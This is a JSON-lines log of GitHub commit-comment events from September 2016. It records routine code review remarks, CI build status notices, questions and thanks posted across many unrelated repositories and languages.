{"id":"4573738996","type":"CommitCommentEvent","actor":{"login":"dennisoelkers"},"repo":{"name":"gaearon/redux-devtools"},"payload":{"comment":{"id":19053259,"position":4,"line":3,"path":"examples/todomvc/.babelrc","commit_id":"64f58b7010a1b2a71ad16716eb37ac1031f93915","created_at":"2016-09-16T12:24:02Z","updated_at":"2016-09-16T12:24:02Z","body":"But at least for me, it still gives a warning to the console that \"react-hot-loader/patch\" did not run immediately before the app started. Is this on purpose?"}},"created_at":"2016-09-16T12:24:02Z"}
{"id":"4573740116","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/Minecraft"},"payload":{"comment":{"id":19053265,"position":null,"line":null,"path":null,"commit_id":"f0c9524ca92e938f35e05a8d60c005e77fc508c9","created_at":"2016-09-16T12:24:19Z","updated_at":"2016-09-16T12:24:19Z","body":"Le cheval\r\n[le cheval.docx](https://github.com/antoinepaul/Minecraft/files/476801/le.cheval.docx)\r\n"}},"created_at":"2016-09-16T12:24:19Z"}
{"id":"4573740268","type":"CommitCommentEvent","actor":{"login":"susee"},"repo":{"name":"bootev/2016-phpunconference-schedule"},"payload":{"comment":{"id":19053267,"position":null,"line":null,"path":null,"commit_id":"c2cc8526cf7c3d9adb06b1064cf38685f297944e","created_at":"2016-09-16T12:24:21Z","updated_at":"2016-09-16T12:24:21Z","body":"band starts between 9pm and 9:30"}},"created_at":"2016-09-16T12:24:21Z"}
{"id":"4573740654","type":"CommitCommentEvent","actor":{"login":"Ingvord"},"repo":{"name":"tango-controls/cppTango"},"payload":{"comment":{"id":19053274,"position":8,"line":8,"path":"cppapi/server/jpeg/CMakeLists.txt","commit_id":"8d7ccfb6b0f88d4ef8000959a8694287af756353","created_at":"2016-09-16T12:24:26Z","updated_at":"2016-09-16T12:24:26Z","body":"TODO: target_compile_definitions(mmx flags)"}},"created_at":"2016-09-16T12:24:26Z"}
{"id":"4573742115","type":"CommitCommentEvent","actor":{"login":"Ingvord"},"repo":{"name":"tango-controls/cppTango"},"payload":{"comment":{"id":19053275,"position":7,"line":7,"path":"cppapi/server/jpeg_mmx/CMakeLists.txt","commit_id":"8d7ccfb6b0f88d4ef8000959a8694287af756353","created_at":"2016-09-16T12:24:48Z","updated_at":"2016-09-16T12:24:48Z","body":"TODO target_compile_definitions(mmx flags)"}},"created_at":"2016-09-16T12:24:48Z"}
{"id":"4573743428","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/Minecraft"},"payload":{"comment":{"id":19053279,"position":null,"line":null,"path":null,"commit_id":"f0c9524ca92e938f35e05a8d60c005e77fc508c9","created_at":"2016-09-16T12:25:08Z","updated_at":"2016-09-16T12:25:08Z","body":"http//:code.org"}},"created_at":"2016-09-16T12:25:08Z"}
{"id":"4573744714","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/Minecraft"},"payload":{"comment":{"id":19053280,"position":null,"line":null,"path":null,"commit_id":"f0c9524ca92e938f35e05a8d60c005e77fc508c9","created_at":"2016-09-16T12:25:25Z","updated_at":"2016-09-16T12:25:25Z","body":"https://studio.code.org/s/20-hour"}},"created_at":"2016-09-16T12:25:25Z"}
{"id":"4573748445","type":"CommitCommentEvent","actor":{"login":"nareshargus"},"repo":{"name":"Freescale/meta-freescale"},"payload":{"comment":{"id":19053294,"position":null,"line":null,"path":null,"commit_id":"cf0dbc3a56bd040581e2b0820e69306687bd1fbb","created_at":"2016-09-16T12:26:20Z","updated_at":"2016-09-16T12:26:20Z","body":"Hi please help me,\r\n\r\nI am trying to write code to access GPIO pins of P2020, can you please answer for following quires \r\n\r\n1) what are header files need to include to access the GPIO Pins of P2020(QorlQ) Processor? Please list the required headers. \r\n2) Please share any datasheet ,which describes programming of  P2020 processor. \r\n\r\nRegards, \r\nNaresh"}},"created_at":"2016-09-16T12:26:20Z"}
{"id":"4573749730","type":"CommitCommentEvent","actor":{"login":"bt"},"repo":{"name":"nabijaczleweli/rust_urlencoding"},"payload":{"comment":{"id":19053296,"position":null,"line":null,"path":null,"commit_id":"a7a4d940f0c178a481033965147665435763ca38","created_at":"2016-09-16T12:26:40Z","updated_at":"2016-09-16T12:26:40Z","body":"Hey @nabijaczleweli,\r\n\r\nJust noticed your fork, thanks for making a contribution!\r\n\r\nDo you mind creating a PR for your work? I'd be happy to merge it in 😄 "}},"created_at":"2016-09-16T12:26:40Z"}
{"id":"4573749782","type":"CommitCommentEvent","actor":{"login":"felixerdy"},"repo":{"name":"sensebox/sensebox.github.io"},"payload":{"comment":{"id":19053297,"position":null,"line":null,"path":null,"commit_id":"27477a93594fc750df649d60c5adc8ccefe36f0c","created_at":"2016-09-16T12:26:41Z","updated_at":"2016-09-16T12:26:41Z","body":"@ubergesundheit ist in der Printausgabe veröffentlicht worden"}},"created_at":"2016-09-16T12:26:41Z"}
{"id":"4573750604","type":"CommitCommentEvent","actor":{"login":"oskarsp"},"repo":{"name":"oskarsp/test"},"payload":{"comment":{"id":19053298,"position":null,"line":null,"path":null,"commit_id":"777efd44c14a18c1d7cfc53502e9d89f4879bdf5","created_at":"2016-09-16T12:26:53Z","updated_at":"2016-09-16T12:26:53Z","body":"..."}},"created_at":"2016-09-16T12:26:53Z"}
{"id":"4573750614","type":"CommitCommentEvent","actor":{"login":"Roppofon"},"repo":{"name":"ResurrectionRemix/ResurrectedScripts"},"payload":{"comment":{"id":19053299,"position":null,"line":null,"path":null,"commit_id":"16be243ec6f4583f540ee1a714957678d637a8b4","created_at":"2016-09-16T12:26:53Z","updated_at":"2016-09-16T12:26:53Z","body":"Purge double entries"}},"created_at":"2016-09-16T12:26:53Z"}
{"id":"4573751811","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19053308,"position":null,"line":null,"path":null,"commit_id":"52d95b3d8a797b8af68a7fa908eb09ee679a5d2e","created_at":"2016-09-16T12:27:13Z","updated_at":"2016-09-16T12:27:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1021](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13423&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T12:27:13Z"}
{"id":"4573751957","type":"CommitCommentEvent","actor":{"login":"michaelklishin"},"repo":{"name":"rabbitmq/rabbitmq-management"},"payload":{"comment":{"id":19053309,"position":19,"line":134,"path":"test/rabbit_mgmt_clustering_SUITE.erl","commit_id":"235d6b7d1dcd63f01b5d3762e2b6c6363538dec9","created_at":"2016-09-16T12:27:14Z","updated_at":"2016-09-16T12:27:14Z","body":"Ah, perfect. Disregard my comment then."}},"created_at":"2016-09-16T12:27:14Z"}
{"id":"4573763418","type":"CommitCommentEvent","actor":{"login":"fritsch"},"repo":{"name":"wrxtasy/LibreELEC.tv.7.0"},"payload":{"comment":{"id":19053358,"position":null,"line":null,"path":null,"commit_id":"34802639f5990d26eafb9aebede0d310e1957aab","created_at":"2016-09-16T12:30:00Z","updated_at":"2016-09-16T12:30:00Z","body":"As you touch the kernel code anyways, why not making it API conform?\r\n\r\nE.g. handle the PT specifics down in the kernel where it belongs by just distinguishing between 8 channel 192 khz PT and 2 channel (48 / 192) khz passthrough.\r\n\r\nThe patch for AESinkALSA is in no way compatible with mainline ALSA sink as it adds a \"side by side\" API to honor AML kernel short comings which is also executed on mainline ALSA.\r\n\r\nThe flag can be set internal by the kernel, when it wants to playback  this. Also the data we send are IEC wrapped packages, so nothing that needs to be parsed / altered later on.\r\n\r\nIt's not much of code to implement that properly in the kernel."}},"created_at":"2016-09-16T12:30:00Z"}
{"id":"4573763661","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"cheminfo/nmr-metadata"},"payload":{"comment":{"id":19053359,"position":null,"line":null,"path":null,"commit_id":"655fb0f1f055193a8107cbdb672d5ebdc1e0a73c","created_at":"2016-09-16T12:30:04Z","updated_at":"2016-09-16T12:30:04Z","body":"You can use v1.1.0"}},"created_at":"2016-09-16T12:30:04Z"}
{"id":"4573765327","type":"CommitCommentEvent","actor":{"login":"KenjiTakahashi"},"repo":{"name":"gokcehan/lf"},"payload":{"comment":{"id":19053362,"position":6,"line":357,"path":"ui.go","commit_id":"d51e99adc16c375dacea6f5c07d9bfcdfcfd4b0f","created_at":"2016-09-16T12:30:25Z","updated_at":"2016-09-16T12:30:25Z","body":"You want it the other way around. This way you're calling it immediately as it gets executed on goroutine stack, it might curropt the read.\r\n```go\r\ndefer func() { go cmd.Wait() }\r\n```\r\n\r\nAlso, since defers are executed LIFO, I think there's no need for separating the close calls like that. Just leave it the way it was before https://github.com/gokcehan/lf/commit/f82073603f1c26a3ee1607530d0a18c4bcd4831b and add the line above."}},"created_at":"2016-09-16T12:30:25Z"}
{"id":"4573765808","type":"CommitCommentEvent","actor":{"login":"takkii"},"repo":{"name":"takkii/Sample"},"payload":{"comment":{"id":19053363,"position":null,"line":null,"path":null,"commit_id":"939c43ecca8ea2f36b83fc86da6f1f86feadbdf9","created_at":"2016-09-16T12:30:31Z","updated_at":"2016-09-16T12:30:31Z","body":"Rubyとrmagickで画像処理をしていくときのサンプル。"}},"created_at":"2016-09-16T12:30:31Z"}
{"id":"4573768327","type":"CommitCommentEvent","actor":{"login":"RamonKenedy"},"repo":{"name":"wmixvideo/nfe"},"payload":{"comment":{"id":19053366,"position":null,"line":null,"path":null,"commit_id":"d5ddc2ddd3f989845e68a5df9cbd1443a891bfd4","created_at":"2016-09-16T12:31:06Z","updated_at":"2016-09-16T12:31:06Z","body":"Bom dia, desde ontem começou a ocorrer o erro ao emitir NFCe : \"Endereço do site da UF da Consulta via QR-Code diverge do previsto\".\r\nVerificando no site do sefaz de Goiás, as URLs que devem ser informadas na tag qrcode são as seguintes:\r\nHomologação: http://homolog.sefaz.go.gov.br/nfeweb/sites/nfce/danfeNFCe\r\nProdução: http://nfe.sefaz.go.gov.br/nfeweb/sites/nfce/danfeNFCe​\r\nAtravés deste link é possível verificar: http://www.nfe.go.gov.br/post/ver/213930/a-sefaz-goias-disponibiliza-a-consulta-da-nota-fiscal-eletronica-do-consumidor---nfc-e-por-qr-code\r\nSe possível, realizar a alteração dessas URLs no projeto.\r\nObrigado!"}},"created_at":"2016-09-16T12:31:06Z"}
{"id":"4573770436","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19053373,"position":null,"line":null,"path":null,"commit_id":"4012446041a8f5ab94ab562569d38ac287a6c2e9","created_at":"2016-09-16T12:31:36Z","updated_at":"2016-09-16T12:31:36Z","body":"层次结构中，每个类都包含Charactersitic和Description这两种类型的成员对象，并且他们也都必须被销毁。所以万一摸个子类需要依赖于其他对象，销毁的顺序应该和初始化的顺序相反。"}},"created_at":"2016-09-16T12:31:36Z"}
{"id":"4573777224","type":"CommitCommentEvent","actor":{"login":"DavidHan008"},"repo":{"name":"DavidHan008/cici2"},"payload":{"comment":{"id":19053390,"position":1,"line":1,"path":"love","commit_id":"0e0771c975a9ab422bed2bc5522d69ca265b6b3b","created_at":"2016-09-16T12:33:14Z","updated_at":"2016-09-16T12:33:14Z","body":"good job!"}},"created_at":"2016-09-16T12:33:14Z"}
{"id":"4573778101","type":"CommitCommentEvent","actor":{"login":"DavidHan008"},"repo":{"name":"DavidHan008/cici2"},"payload":{"comment":{"id":19053392,"position":1,"line":1,"path":"love","commit_id":"0e0771c975a9ab422bed2bc5522d69ca265b6b3b","created_at":"2016-09-16T12:33:27Z","updated_at":"2016-09-16T12:33:27Z","body":"thanks"}},"created_at":"2016-09-16T12:33:27Z"}
{"id":"4573780417","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053401,"position":null,"line":null,"path":null,"commit_id":"988d67ddce0e8e00ff04512fe37020385e811fb9","created_at":"2016-09-16T12:34:01Z","updated_at":"2016-09-16T12:34:01Z","body":"TeamCity Todo :: Build [Build 107](http://109.103.226.38:8512/viewLog.html?buildId=38502&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-16T12:34:01Z"}
{"id":"4573781799","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053408,"position":null,"line":null,"path":null,"commit_id":"988d67ddce0e8e00ff04512fe37020385e811fb9","created_at":"2016-09-16T12:34:18Z","updated_at":"2016-09-16T12:34:18Z","body":"TeamCity Todo :: Build [Build 107](http://109.103.226.38:8512/viewLog.html?buildId=38502&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 15 Build time: 00:00:16"}},"created_at":"2016-09-16T12:34:18Z"}
{"id":"4573782461","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"KairusDarkSeeker/SkinStealer"},"payload":{"comment":{"id":19053410,"position":null,"line":null,"path":null,"commit_id":"ad979b4c323a80098598e48a3ff903d9ace22f56","created_at":"2016-09-16T12:34:27Z","updated_at":"2016-09-16T12:34:27Z","body":"Nevermind, tested it. Client still has it's originally skin."}},"created_at":"2016-09-16T12:34:27Z"}
{"id":"4573783084","type":"CommitCommentEvent","actor":{"login":"knocte"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19053415,"position":null,"line":null,"path":null,"commit_id":"9804bbc9dae393e03f1750ab50807d326be0e980","created_at":"2016-09-16T12:34:36Z","updated_at":"2016-09-16T12:34:36Z","body":"Oh I see, the can of worms that comes with writing unsafe C# code :-o  :-)"}},"created_at":"2016-09-16T12:34:36Z"}
{"id":"4573788901","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053430,"position":null,"line":null,"path":null,"commit_id":"afcfea1ebe80ddd6f65b605ba736c83d6707922a","created_at":"2016-09-16T12:35:52Z","updated_at":"2016-09-16T12:35:52Z","body":"TeamCity Todo :: Build [Build 109](http://109.103.226.38:8512/viewLog.html?buildId=38504&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-16T12:35:52Z"}
{"id":"4573788904","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053431,"position":null,"line":null,"path":null,"commit_id":"1523a882f09e4616c63e51bca69e99fdfc31090c","created_at":"2016-09-16T12:35:52Z","updated_at":"2016-09-16T12:35:52Z","body":"TeamCity Todo :: Build [Build 108](http://109.103.226.38:8512/viewLog.html?buildId=38503&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-16T12:35:52Z"}
{"id":"4573789988","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053434,"position":null,"line":null,"path":null,"commit_id":"1523a882f09e4616c63e51bca69e99fdfc31090c","created_at":"2016-09-16T12:36:09Z","updated_at":"2016-09-16T12:36:09Z","body":"TeamCity Todo :: Build [Build 108](http://109.103.226.38:8512/viewLog.html?buildId=38503&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 19 Build time: 00:00:17"}},"created_at":"2016-09-16T12:36:09Z"}
{"id":"4573790010","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053435,"position":null,"line":null,"path":null,"commit_id":"afcfea1ebe80ddd6f65b605ba736c83d6707922a","created_at":"2016-09-16T12:36:09Z","updated_at":"2016-09-16T12:36:09Z","body":"TeamCity Todo :: Build [Build 109](http://109.103.226.38:8512/viewLog.html?buildId=38504&buildTypeId=Todo_Build) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:17"}},"created_at":"2016-09-16T12:36:09Z"}
{"id":"4573790204","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053436,"position":null,"line":null,"path":null,"commit_id":"4fe661a91db2dc1622576ca37ffc314e74323965","created_at":"2016-09-16T12:36:11Z","updated_at":"2016-09-16T12:36:11Z","body":"TeamCity Todo :: Build [Build 110](http://109.103.226.38:8512/viewLog.html?buildId=38505&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-16T12:36:11Z"}
{"id":"4573790488","type":"CommitCommentEvent","actor":{"login":"oliviertassinari"},"repo":{"name":"oliviertassinari/material-ui"},"payload":{"comment":{"id":19053437,"position":21,"line":41,"path":"docs/src/app/components/pages/components/DatePicker/ExampleInternational.js","commit_id":"2c8c317f1a815afabc178c6149b7259b3cec77cf","created_at":"2016-09-16T12:36:14Z","updated_at":"2016-09-16T12:36:14Z","body":"@mehdijjz Can you submit a PR for this? Thanks for the tip!"}},"created_at":"2016-09-16T12:36:14Z"}
{"id":"4573791485","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053440,"position":null,"line":null,"path":null,"commit_id":"4fe661a91db2dc1622576ca37ffc314e74323965","created_at":"2016-09-16T12:36:29Z","updated_at":"2016-09-16T12:36:29Z","body":"TeamCity Todo :: Build [Build 110](http://109.103.226.38:8512/viewLog.html?buildId=38505&buildTypeId=Todo_Build) outcome was **FAILURE**\nSummary: Tests passed: 20; exit code 1 Build time: 00:00:18"}},"created_at":"2016-09-16T12:36:29Z"}
{"id":"4573792529","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19053444,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-16T12:36:44Z","updated_at":"2016-09-16T12:36:44Z","body":"[le cheval.docx](https://github.com/antoinepaul/antoinepaul/files/476823/le.cheval.docx)\r\n"}},"created_at":"2016-09-16T12:36:44Z"}
{"id":"4573794144","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19053448,"position":null,"line":null,"path":null,"commit_id":"52d95b3d8a797b8af68a7fa908eb09ee679a5d2e","created_at":"2016-09-16T12:37:05Z","updated_at":"2016-09-16T12:37:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1021](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13423&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:09:52"}},"created_at":"2016-09-16T12:37:05Z"}
{"id":"4573794457","type":"CommitCommentEvent","actor":{"login":"lucianopf"},"repo":{"name":"lucianopf/cep-promise"},"payload":{"comment":{"id":19053449,"position":33,"line":108,"path":"src/cep-promise.js","commit_id":"3ecc0a7757656b198b8d4c5e826e297af4562ece","created_at":"2016-09-16T12:37:10Z","updated_at":"2016-09-16T12:37:10Z","body":"Na real ta assim nos commits seguintes rsrs, é pq esse que vc pegou foi o que fiz correndo no trampo hahaha\r\nMas valeu! ^^"}},"created_at":"2016-09-16T12:37:10Z"}
{"id":"4573796142","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19053460,"position":null,"line":null,"path":null,"commit_id":"0dac9af20af117b88d31addc4f1eec77f22f7498","created_at":"2016-09-16T12:37:35Z","updated_at":"2016-09-16T12:37:35Z","body":"@This time you misunderstood me, i never told that they was same as i checked before, just that one was maybe suffisent.\r\n\r\nP.S. We just polluting the posts for nothing so i will delete our posts."}},"created_at":"2016-09-16T12:37:35Z"}
{"id":"4573797644","type":"CommitCommentEvent","actor":{"login":"lesander"},"repo":{"name":"skillzzjesse/draw"},"payload":{"comment":{"id":19053462,"position":5,"line":35,"path":"index.html","commit_id":"3801fae5a42c5e15f66b880553e9418d3d99a5ca","created_at":"2016-09-16T12:37:56Z","updated_at":"2016-09-16T12:37:56Z","body":"*analytics :wink: "}},"created_at":"2016-09-16T12:37:56Z"}
{"id":"4573800725","type":"CommitCommentEvent","actor":{"login":"annakawaguchi5"},"repo":{"name":"annakawaguchi5/css"},"payload":{"comment":{"id":19053468,"position":null,"line":null,"path":null,"commit_id":"7a444c554fcd593dfd6a6e5f796e139abafd5f29","created_at":"2016-09-16T12:38:40Z","updated_at":"2016-09-16T12:38:40Z","body":"9/16"}},"created_at":"2016-09-16T12:38:40Z"}
{"id":"4573800948","type":"CommitCommentEvent","actor":{"login":"ceasbz"},"repo":{"name":"lucianopf/cep-promise"},"payload":{"comment":{"id":19053469,"position":33,"line":108,"path":"src/cep-promise.js","commit_id":"3ecc0a7757656b198b8d4c5e826e297af4562ece","created_at":"2016-09-16T12:38:44Z","updated_at":"2016-09-16T12:38:44Z","body":"Ahh sim! Eu só vi este link, realmente não vi o estado atual! Boa, as alterações ficaram bacanas 👍 "}},"created_at":"2016-09-16T12:38:44Z"}
{"id":"4573810143","type":"CommitCommentEvent","actor":{"login":"skillzzjesse"},"repo":{"name":"skillzzjesse/draw"},"payload":{"comment":{"id":19053488,"position":5,"line":35,"path":"index.html","commit_id":"3801fae5a42c5e15f66b880553e9418d3d99a5ca","created_at":"2016-09-16T12:40:49Z","updated_at":"2016-09-16T12:40:49Z","body":"What's done is done"}},"created_at":"2016-09-16T12:40:49Z"}
{"id":"4573812796","type":"CommitCommentEvent","actor":{"login":"viveksri15"},"repo":{"name":"viveksri15/architectureNotes"},"payload":{"comment":{"id":19053498,"position":null,"line":null,"path":null,"commit_id":"445f6dba03aa14619feb4ae4e95ad69ff8c0cc84","created_at":"2016-09-16T12:41:22Z","updated_at":"2016-09-16T12:41:22Z","body":"Thanks!"}},"created_at":"2016-09-16T12:41:22Z"}
{"id":"4573813934","type":"CommitCommentEvent","actor":{"login":"RagnarR"},"repo":{"name":"pubnative/pubnative-android-library"},"payload":{"comment":{"id":19053502,"position":null,"line":null,"path":null,"commit_id":"131be78ee44be4b4f351b2411075275939a6486f","created_at":"2016-09-16T12:41:37Z","updated_at":"2016-09-16T12:41:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;T1x3FFR5&#x2F;1167-6-adchoices-sdk-support-5\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (6) Adchoices SDK support [5]</a>"}},"created_at":"2016-09-16T12:41:37Z"}
{"id":"4573822624","type":"CommitCommentEvent","actor":{"login":"rubysoho07"},"repo":{"name":"rubysoho07/MusicManager"},"payload":{"comment":{"id":19053520,"position":null,"line":null,"path":null,"commit_id":"8760f52614cd8c0bd7301e36af765c2506eb9e7d","created_at":"2016-09-16T12:43:36Z","updated_at":"2016-09-16T12:43:36Z","body":"Using button style"}},"created_at":"2016-09-16T12:43:36Z"}
{"id":"4573826101","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"denali-js/denali"},"payload":{"comment":{"id":19053526,"position":4,"line":96,"path":"lib/cli/commands/index.js","commit_id":"614bbd8e102bcf24d078800c072622f054e0f95b","created_at":"2016-09-16T12:44:25Z","updated_at":"2016-09-16T12:44:25Z","body":"Has been removed in another commit"}},"created_at":"2016-09-16T12:44:25Z"}
{"id":"4573826939","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"denali-js/denali"},"payload":{"comment":{"id":19053531,"position":4,"line":59,"path":"lib/cli/commands/build.js","commit_id":"614bbd8e102bcf24d078800c072622f054e0f95b","created_at":"2016-09-16T12:44:38Z","updated_at":"2016-09-16T12:44:38Z","body":"Has been removed in another commit"}},"created_at":"2016-09-16T12:44:38Z"}
{"id":"4573828909","type":"CommitCommentEvent","actor":{"login":"laf"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":19053536,"position":null,"line":null,"path":null,"commit_id":"8c5ff4609b31eb4864c7112bbc90381dc857e03d","created_at":"2016-09-16T12:45:05Z","updated_at":"2016-09-16T12:45:05Z","body":"I'm not sure if you mean that I shouldn't have changed this?\r\n\r\nThe sql file variable sets ../build.sql, I attempted to change this to ./build.sql but it still didn't work so reverting it back to how it was before was the quicker option."}},"created_at":"2016-09-16T12:45:05Z"}
{"id":"4573829593","type":"CommitCommentEvent","actor":{"login":"ingvald"},"repo":{"name":"ingvald/inxMonitorStrips"},"payload":{"comment":{"id":19053541,"position":null,"line":null,"path":null,"commit_id":"d4c9a72d1d50ccbfd7e7ec55754cd35d8c309b1a","created_at":"2016-09-16T12:45:15Z","updated_at":"2016-09-16T12:45:15Z","body":"fixes #2 "}},"created_at":"2016-09-16T12:45:15Z"}
{"id":"4573832569","type":"CommitCommentEvent","actor":{"login":"foghina"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19053550,"position":null,"line":null,"path":null,"commit_id":"eb3360b02ab82d20bc3c3f38f543b0d742598346","created_at":"2016-09-16T12:45:51Z","updated_at":"2016-09-16T12:45:51Z","body":"@gre ah, sorry about that, didn't know. Refs are generally private so I assumed this wouldn't break anything. I guess exposing `getComponent()` would work."}},"created_at":"2016-09-16T12:45:51Z"}
{"id":"4573833278","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19053552,"position":null,"line":null,"path":null,"commit_id":"e4c8bed5b06e2d19c1c420309cef0dcf677c776f","created_at":"2016-09-16T12:46:02Z","updated_at":"2016-09-16T12:46:02Z","body":"Really ?"}},"created_at":"2016-09-16T12:46:02Z"}
{"id":"4573836370","type":"CommitCommentEvent","actor":{"login":"gokcehan"},"repo":{"name":"gokcehan/lf"},"payload":{"comment":{"id":19053559,"position":6,"line":357,"path":"ui.go","commit_id":"d51e99adc16c375dacea6f5c07d9bfcdfcfd4b0f","created_at":"2016-09-16T12:46:44Z","updated_at":"2016-09-16T12:46:44Z","body":"Away from keyboard now. I will take a look again later today.\nOn Sep 16, 2016 3:30 PM, \"Karol Woźniak\" <notifications@github.com> wrote:\n\n> You want it the other way around. This way you're calling it immediately\n> as it gets executed on goroutine stack, it might curropt the read.\n>\n> defer func() { go cmd.Wait() }\n>\n> Also, since defers are executed LIFO, I think there's no need for\n> separating the close calls like that. Just leave it the way it was before\n> f820736\n> <https://github.com/gokcehan/lf/commit/f82073603f1c26a3ee1607530d0a18c4bcd4831b>\n> and add the line above.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gokcehan/lf/commit/d51e99adc16c375dacea6f5c07d9bfcdfcfd4b0f#commitcomment-19053362>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABwCmPK0bpPqJ6F1YZ_x-FCkUOcF9B1Xks5qqovhgaJpZM4J-42U>\n> .\n>\n"}},"created_at":"2016-09-16T12:46:44Z"}
{"id":"4573837516","type":"CommitCommentEvent","actor":{"login":"tarekkh"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":19053562,"position":53,"line":594,"path":"service/mcs/persistent/src/main/java/eu/europeana/cloud/service/mcs/persistent/cassandra/CassandraDataSetDAO.java","commit_id":"e0d40a58a91f7c716f1f709cf80d67f6205f3d82","created_at":"2016-09-16T12:47:00Z","updated_at":"2016-09-16T12:47:00Z","body":"This method is still long and hard to understand. Its Cyclomatic complexity is 17 which is far more bigger than allowed \r\n\r\n"}},"created_at":"2016-09-16T12:47:00Z"}
{"id":"4573837923","type":"CommitCommentEvent","actor":{"login":"Hrxn"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19053564,"position":null,"line":null,"path":null,"commit_id":"95be29e1c6b7a06ac444d5142582ebece79698ff","created_at":"2016-09-16T12:47:06Z","updated_at":"2016-09-16T12:47:06Z","body":"And the same API key..."}},"created_at":"2016-09-16T12:47:06Z"}
{"id":"4573838925","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053566,"position":null,"line":null,"path":null,"commit_id":"e26e4343bd0e30996cb331d8ef80e55165f0ad26","created_at":"2016-09-16T12:47:19Z","updated_at":"2016-09-16T12:47:19Z","body":"TeamCity Todo :: Build [Build 111](http://109.103.226.38:8512/viewLog.html?buildId=38506&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-16T12:47:19Z"}
{"id":"4573839653","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053568,"position":null,"line":null,"path":null,"commit_id":"e26e4343bd0e30996cb331d8ef80e55165f0ad26","created_at":"2016-09-16T12:47:28Z","updated_at":"2016-09-16T12:47:28Z","body":"TeamCity Todo :: Build [Build 111](http://109.103.226.38:8512/viewLog.html?buildId=38506&buildTypeId=Todo_Build) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:05"}},"created_at":"2016-09-16T12:47:28Z"}
{"id":"4573842187","type":"CommitCommentEvent","actor":{"login":"laoyawocom"},"repo":{"name":"laoyawocom/wo"},"payload":{"comment":{"id":19053575,"position":null,"line":null,"path":null,"commit_id":"a1ad596241e6cc01ac980c77f596419cc93bf0d0","created_at":"2016-09-16T12:48:05Z","updated_at":"2016-09-16T12:48:05Z","body":"再来个最新地址 www.laoyaworb.com"}},"created_at":"2016-09-16T12:48:05Z"}
